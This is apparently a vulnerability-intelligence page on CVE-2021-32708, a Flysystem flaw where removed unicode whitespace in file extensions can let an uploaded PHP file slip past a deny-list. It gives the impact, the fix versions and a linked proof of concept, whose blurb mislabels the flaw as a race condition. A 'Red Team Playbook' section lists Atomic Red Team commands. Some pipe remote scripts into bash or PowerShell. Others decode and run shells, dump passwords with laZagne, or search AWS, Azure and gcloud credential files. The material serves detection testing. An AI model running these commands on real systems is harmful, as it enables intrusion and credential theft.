CVE-2021-32708
Overview
This vulnerability is a remote code execution flaw caused by improper handling of unicode whitespace characters in file path normalization within thephpleague Flysystem versions 1.x and 2.x. The root cause lies in the whitespace normalization process that removes unicode whitespace characters rather than rejecting them, affecting the file storage path validation component. This allows maliciously crafted filenames to bypass extension deny-lists and be stored in executable directories without proper sanitization.
Vulnerability Description
Flysystem is an open source file storage library for PHP. The whitespace normalisation using in 1.x and 2.x removes any unicode whitespace. Under certain specific conditions this could potentially allow a malicious user to execute code remotely. The conditions are: A user is allowed to supply the path or filename of an uploaded file, the supplied path or filename is not checked against unicode chars, the supplied pathname checked against an extension deny-list, not an allow-list, the supplied path or filename contains a unicode whitespace char in the extension, the uploaded file is stored in a directory that allows PHP code to be executed. Given these conditions are met a user can upload and execute arbitrary code on the system under attack. The unicode whitespace removal has been replaced with a rejection (exception). For 1.x users, upgrade to 1.1.4. For 2.x users, upgrade to 2.1.1.
Impact
An unauthenticated attacker can exploit this vulnerability to upload and execute arbitrary PHP code on the target system, leading to full system compromise. The attack requires the ability to control the filename or path of an uploaded file and for the application to store files in executable directories. This can result in data breaches, service disruption, or lateral movement within the network. The CVSS vector indicates no privileges or user interaction are required (AV:N/AC:L/PR:N/UI:N), with high confidentiality, integrity, and availability impact (C:H/I:H/A:H).
Solution
Users of thephpleague Flysystem should upgrade to version 1.1.4 if using 1.x or to 2.1.1 if using 2.x, as these versions replace unicode whitespace removal with rejection exceptions. Detailed patch instructions and advisories are available at the Flysystem GitHub security advisory (GHSA-9f46-5r25-5wfm) and Fedora package announcements (https://lists.fedoraproject.org/archives/list/[email protected]/message/RNZSWK4GOMJOOHKLZEOE5AQSLC4DNCRZ/). No alternative workarounds are specified.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Flysystem library, an open-source file storage solution for PHP, stems from improper handling of unicode whitespace during file path normalization. In versions 1.x and 2.x, the library's method of normalizing whitespace inadvertently allows for the execution of arbitrary code under specific conditions. This occurs when a user is permitted to supply a path or filename for an uploaded file, and the application fails to adequately validate this input against unicode characters. Instead of employing a robust allow-list approach, the system utilizes a deny-list for file extensions, which can be circumvented if a malicious actor embeds unicode whitespace characters within the extension of a filename. If the uploaded file is stored in a directory configured to execute PHP code, this can lead to remote code execution, posing a significant security risk.
Attack vectors exploiting this vulnerability are particularly insidious due to their reliance on user input. An attacker could craft a filename that appears benign but contains unicode whitespace, thereby bypassing the extension deny-list. For instance, a filename like "malicious.php " (where the space is a unicode character) could be accepted by the system, leading to the execution of arbitrary PHP code once uploaded. This exploitation requires that the application does not adequately sanitize or validate user input, highlighting the importance of rigorous input validation mechanisms. Furthermore, the attack can be executed with minimal technical skill, making it accessible to a wider range of potential attackers.
The real-world implications of this vulnerability are severe, particularly for organizations that rely on Flysystem for file management. Successful exploitation could lead to unauthorized access to sensitive data, manipulation of files, or even complete system compromise. The potential for data breaches could result in significant financial losses, reputational damage, and legal ramifications, especially if personal data is involved. Businesses that fail to address this vulnerability may find themselves at risk of compliance violations, particularly under regulations such as GDPR or HIPAA, which mandate strict data protection measures.
To detect and mitigate this vulnerability, organizations should first ensure that they are using the latest versions of the Flysystem library, as updates have addressed the issue by replacing the problematic whitespace normalization with a rejection mechanism. Regularly auditing and updating all software components is crucial in maintaining a secure environment. Additionally, implementing strict input validation practices, including the use of allow-lists for file extensions and thorough sanitization of user inputs, can significantly reduce the risk of exploitation. Monitoring file uploads and establishing anomaly detection systems can also help identify and respond to suspicious activities in real time.
In conclusion, the vulnerability within the Flysystem library exemplifies the critical need for secure coding practices and robust input validation in software development. By understanding the technical details, potential attack vectors, and real-world impacts of such vulnerabilities, organizations can better prepare themselves against the evolving threat landscape. Proactive measures, including timely updates and comprehensive security policies, are essential in safeguarding against the exploitation of vulnerabilities that could lead to significant operational and financial repercussions.
Affected Products (4)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Thephpleague | Flysystem | All |
cpe:2.3:a:thephpleague:flysystem:*:*:*:*:*:*:*:*
|
|
|
Thephpleague | Flysystem | All |
cpe:2.3:a:thephpleague:flysystem:*:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 33 |
cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 34 |
cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
fazilbaig1/CVE-2021-32708
Affected versions of this package are vulnerable to Race Condition. The whitespace normalisation using in 1.x and 2.x re...
|
fazilbaig1 | 1 | 0 | 2024-10-19 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-32708 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/thephpleague/flysystem/security/advisories/GHSA-9f46-5r25-5wfm |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/thephpleague/flysystem/commit/a3c694de9f7e844b76f9d1b61296ebf6e8d89d74 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/thephpleague/flysystem/commit/f3ad69181b8afed2c9edf7be5a2918144ff4ea32 |
| packagist.org |
GitHub CVE
x_refsource_MISC
|
https://packagist.org/packages/league/flysystem |
| lists.fedoraproject.org |
GitHub CVE
vendor-advisory
x_refsource_FEDORA
|
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RNZSWK4GOMJOOHKLZEOE5AQSLC4DNCRZ/ |
| lists.fedoraproject.org |
GitHub CVE
vendor-advisory
x_refsource_FEDORA
|
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NWPTENBYKI2IG47GI4DHAACLNRLTWUR5/ |